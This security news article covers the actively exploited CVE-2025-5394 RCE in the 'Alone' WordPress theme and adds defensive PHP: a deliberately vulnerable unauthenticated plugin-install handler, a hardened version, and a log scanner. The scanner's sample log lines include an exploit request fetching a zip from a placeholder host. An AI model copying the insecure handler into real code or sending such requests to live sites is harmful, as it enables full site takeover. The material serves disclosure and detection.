WordPress Theme RCE Vulnerability Actively Exploited to Take Full Site Control
A critical remote code execution (RCE) vulnerability in the popular “Alone” WordPress theme is being actively exploited by attackers to gain complete control of vulnerable websites.
The vulnerability, assigned CVE-2025-5394 with a maximum CVSS score of 9.8, affects over 9,000 sites using versions 7.8.3 and below of the charity-focused theme.
Key Takeaways
1. Critical RCE flaw in the Alone WordPress theme allows full site takeover.
2. 120,900+ active attacks deploying malicious backdoors since July 12th.
3. Update immediately if using older versions.
Technical Details of the WordPress Theme Vulnerability
The vulnerability stems from a missing capability check in the alone_import_pack_install_plugin() function, which handles plugin installations during theme setup.
The flawed code allows unauthenticated attackers to exploit the wp_ajax_nopriv_alone_import_pack_install_plugin AJAX action to upload arbitrary files disguised as plugins from remote sources.
The vulnerable function processes POST data without any authentication or capability check.
This design flaw enables attackers to install malicious plugins containing webshells and backdoors by sending crafted requests to /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin.
The vulnerability allows both local plugin slugs and remote sources via the plugin_source parameter, making exploitation trivial for cybercriminals.
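To make the "missing capability check" concrete, the following is an added illustrative example, not code from the Alone theme, from its patch or from Wordfence. It contrasts a handler registered on the unauthenticated nopriv hook that installs whatever package location the client supplies with a hardened handler that only runs for logged-in users, verifies a nonce, requires the install_plugins capability, restricts the request to an allowlisted slug and resolves the download URL server-side through the WordPress.org Plugins API. The function names, the example_install_plugin action and nonce name, and the allowlist contents are hypothetical; the WordPress functions used (check_ajax_referer, current_user_can, plugins_api, Plugin_Upgrader, WP_Ajax_Upgrader_Skin) are real core APIs, and the snippet assumes it is loaded from a theme's functions.php.

```php
<?php
// Added illustrative example (not the Alone theme's code). All example_* names,
// the 'example_install_plugin' action/nonce and the allowlist are hypothetical.

// --- Vulnerable pattern: registered on the nopriv hook, so it runs for visitors
// who are not logged in; no nonce, no current_user_can(), and the package
// location is taken straight from the request body.
add_action( 'wp_ajax_nopriv_example_install_plugin', 'example_install_plugin_vulnerable' );
function example_install_plugin_vulnerable() {
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $source   = isset( $_POST['plugin_source'] ) ? $_POST['plugin_source'] : '';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $upgrader->install( $source ); // downloads and unpacks whatever the client supplied
    wp_die();
}

// --- Hardened pattern: logged-in hook only, nonce check, capability check,
// slug allowlist, and the download URL resolved server-side from WordPress.org.
add_action( 'wp_ajax_example_install_plugin', 'example_install_plugin_hardened' );
function example_install_plugin_hardened() {
    check_ajax_referer( 'example_install_plugin', 'nonce' ); // dies on a missing or bad nonce
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 ); // wp_send_json_error() exits
    }

    $slug = isset( $_POST['plugin_slug'] ) ? sanitize_key( wp_unslash( $_POST['plugin_slug'] ) ) : '';
    if ( ! example_plugin_slug_allowed( $slug ) ) {
        wp_send_json_error( 'plugin not in allowlist', 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // Ask the WordPress.org Plugins API for the package URL instead of trusting the client.
    $api = plugins_api(
        'plugin_information',
        array( 'slug' => $slug, 'fields' => array( 'sections' => false ) )
    );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( $api->get_error_message(), 502 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );
    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( 'installation failed', 500 );
    }
    wp_send_json_success( array( 'installed' => $slug ) );
}

// Hypothetical allowlist of slugs the theme legitimately needs; anything else is refused.
function example_plugin_slug_allowed( $slug ) {
    $allowed = array( 'classic-editor', 'contact-form-7' ); // constructed list
    return in_array( $slug, $allowed, true );
}
```

The important design choice is that the hardened handler never accepts a URL from the request at all: the client may only name a slug, and the server decides where that slug is fetched from. Dropping the wp_ajax_nopriv_ registration removes the unauthenticated path entirely, and the capability check covers the case of a low-privilege logged-in account.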
| Risk Factors | Details |
| Affected Products | Alone – Charity Multipurpose Non-profit WordPress Theme ≤ 7.8.3 |
| Impact | Remote Code Execution (RCE), Complete Site Takeover |
| Exploit Prerequisites | Unauthenticated exploitation possible |
| CVSS 3.1 Score | 9.8 (Critical) |
Theme RCE Vulnerability Actively Exploited
Exploitation began on July 12th, 2025, two days before the vulnerability’s public disclosure, indicating attackers monitor software patches for newly fixed security issues.
Wordfence security researchers have documented over 120,900 blocked exploit attempts since monitoring began.
Attackers are deploying sophisticated malware through malicious zip files with names like wp-classic-editor.zip and background-image-cropper.zip. One captured backdoor sample demonstrates typical obfuscation techniques.
The most active attacking IP addresses include 193.84.71.244 (39,900+ requests) and 87.120.92.24 (37,100+ requests). Malicious domains hosting exploit payloads include cta.imasync[.]com and dari-slideshow[.]ru.
Website administrators must immediately update to the Alone theme version 7.8.5 or later, which patches the vulnerability. Wordfence firewall users received protection rules on May 30th, 2025, with free tier users protected from June 29th.
Security teams should examine /wp-content/plugins and /wp-content/upgrade directories for suspicious plugin installations and review access logs for requests matching the exploit pattern.
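The log review suggested above can be scripted. The following is an added example, not code from the article, from Wordfence or from the theme: it parses web-server access-log lines in the common "combined" format, flags requests to admin-ajax.php whose action parameter is alone_import_pack_install_plugin, records the host of any plugin_source value that appeared in the query string, counts hits per source IP, and checks a list of plugin directory names against the malicious archive names reported in the article. The function names are hypothetical; the sample log lines are constructed (the two source IPs are the ones named in the article, while the payload host is a made-up name, since the real domains are deliberately not reproduced). Note that POST bodies are not written to access logs, so a plugin_source sent in the body will only show up as an unexplained request to the action.

```php
<?php
// Added example (not code from the article, Wordfence or the Alone theme).
// Function names and sample log lines are constructed for this example.

const ALONE_AJAX_ACTION = 'alone_import_pack_install_plugin';

// Parse one Apache/Nginx "combined" log line; returns null if it does not match.
function parse_log_line( $line ) {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /';
    if ( ! preg_match( $re, $line, $m ) ) {
        return null;
    }
    return array( 'ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'uri' => $m[4], 'status' => (int) $m[5] );
}

// Split a request URI into path and decoded query parameters.
function split_uri( $uri ) {
    $parts  = explode( '?', $uri, 2 );
    $params = array();
    if ( isset( $parts[1] ) ) {
        parse_str( $parts[1], $params );
    }
    return array( $parts[0], $params );
}

// True when the request targets the vulnerable AJAX action.
function is_alone_exploit_request( $uri ) {
    list( $path, $params ) = split_uri( $uri );
    if ( substr( $path, -strlen( '/admin-ajax.php' ) ) !== '/admin-ajax.php' ) {
        return false;
    }
    return isset( $params['action'] ) && $params['action'] === ALONE_AJAX_ACTION;
}

// Scan log lines; returns matching requests plus a per-IP hit count (highest first).
function scan_access_log( array $lines, $site_host ) {
    $hits  = array();
    $by_ip = array();
    foreach ( $lines as $line ) {
        $rec = parse_log_line( $line );
        if ( $rec === null || ! is_alone_exploit_request( $rec['uri'] ) ) {
            continue;
        }
        list( , $params ) = split_uri( $rec['uri'] );
        $rec['remote_source'] = null;
        if ( isset( $params['plugin_source'] ) ) {
            $host = parse_url( $params['plugin_source'], PHP_URL_HOST );
            if ( is_string( $host ) && strcasecmp( $host, $site_host ) !== 0 ) {
                $rec['remote_source'] = $host; // package would be fetched from a third-party host
            }
        }
        $hits[] = $rec;
        $by_ip[ $rec['ip'] ] = ( isset( $by_ip[ $rec['ip'] ] ) ? $by_ip[ $rec['ip'] ] : 0 ) + 1;
    }
    arsort( $by_ip );
    return array( 'hits' => $hits, 'by_ip' => $by_ip );
}

// Compare plugin directory names (e.g. from scandir on wp-content/plugins or
// wp-content/upgrade) against the malicious archive names reported in the article.
function suspicious_plugin_dirs( array $dir_names ) {
    $known_bad = array( 'wp-classic-editor', 'background-image-cropper' );
    return array_values( array_intersect( $dir_names, $known_bad ) );
}

// Constructed sample lines; "payload.invalid" is a placeholder host, not a real IoC.
$sample_log = array(
    '203.0.113.10 - - [20/Jul/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '193.84.71.244 - - [20/Jul/2025:10:00:02 +0000] "POST /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin HTTP/1.1" 200 211 "-" "curl/8.0"',
    '87.120.92.24 - - [20/Jul/2025:10:00:03 +0000] "POST /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin&plugin_source=http://payload.invalid/wp-classic-editor.zip HTTP/1.1" 200 211 "-" "python-requests/2.31"',
    '193.84.71.244 - - [20/Jul/2025:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 52 "-" "Mozilla/5.0"',
);

$report = scan_access_log( $sample_log, 'example.org' );
foreach ( $report['by_ip'] as $ip => $n ) {
    echo "$ip: $n exploit request(s)\n";
}
foreach ( $report['hits'] as $h ) {
    echo $h['time'] . ' ' . $h['ip'] . ' ' . $h['uri'] . ( $h['remote_source'] ? ' remote=' . $h['remote_source'] : '' ) . "\n";
}
print_r( suspicious_plugin_dirs( array( 'akismet', 'wp-classic-editor', 'hello-dolly' ) ) );
```

Run against the constructed lines, the heartbeat request and the ordinary page view are ignored, the two requests to the vulnerable action are reported with 193.84.71.244 and 87.120.92.24 at one hit each, the second hit is annotated with the external host found in plugin_source, and wp-classic-editor is returned as a suspicious directory name. In production, feed the function the real log files (one line per array element) and the site's own hostname, and treat any hit as a reason to inspect the plugin and upgrade directories for recently created archives or PHP files.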